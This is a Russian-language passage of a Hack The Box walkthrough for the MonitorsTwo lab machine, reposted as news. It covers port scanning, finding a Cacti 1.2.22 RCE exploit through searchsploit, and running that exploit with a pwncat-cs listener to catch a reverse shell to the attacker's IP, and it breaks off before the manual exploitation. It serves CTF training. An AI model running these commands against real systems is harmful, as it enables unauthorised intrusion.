Категория > Новости > HTB MonitorsTwo. Повышаем привилегии и сбегаем из контейнера Docker - «Новости»
HTB MonitorsTwo. Повышаем привилегии и сбегаем из контейнера Docker - «Новости»11-09-2023, 08:01. Автор: Аким |
Hack The Box. Уровень ее сложности — легкий. warningПодключаться к машинам с HTB рекомендуется только через VPN. Не делай этого с компьютеров, где есть важные для тебя данные, так как ты окажешься в общей сети с другими участниками.
Разведка
Сканирование портовДобавляем IP-адрес машины в 10.10.11.211 monitorstwo.htb И запускаем сканирование портов. Справка: сканирование портовСканирование портов — стандартный первый шаг при любой атаке. Он позволяет атакующему узнать, какие службы на хосте принимают соединение. На основе этой информации выбирается следующий шаг к получению точки входа. Наиболее известный инструмент для сканирования — это Nmap. Улучшить результаты его работы ты можешь при помощи следующего скрипта:
Он действует в два этапа. На первом производится обычное быстрое сканирование, на втором — более тщательное сканирование, с использованием имеющихся скриптов (опция Результат работы скрипта Сканер находит нам два открытых порта: 22 — служба OpenSSH 8.2p1 и 80 — веб‑сервер Nginx 1.18.0. Сразу переходим к сайту и видим там форму авторизации. Страница авторизации сайта Ниже указана версия CMS Cacti — 1.2.22.
Точка входаПервым делом стоит проверить, есть ли для обнаруженного движка уже готовые эксплоиты. Если ты, как и я, используешь Kali Linux, то база эксплоитов ExploitDB у тебя уже есть под рукой. Достаточно вызвать утилиту SearchSploit и указать ключевое слово. searchsploit Cacti Эксплоиты, найденные при помощи SearchSploit Видим, что есть эксплоит для подходящей версии Cacti. Он должен дать нам возможность удаленного выполнения кода (RCE). Посмотрим, какая есть дополнительная информация об эксплоите. searchsploit -pphp/webapps/51166.py Информация об эксплоите Приступаем к эксплуатации. Сначала запустим листенер pwncat-cs для получения реверс‑шелла. А затем и сам эксплоит: python3 51166.py -uhttp://10.10.11.211 -p10.10.14.111 -i4321 Но в ответ ничего не получаем. Видимо, у нас нет доступа к нужному эндпоинту API. Что ж, придется действовать вручную. Открываем код эксплоита и пробуем повторить шаги. Исходный код эксплоита Перейти обратно к новости |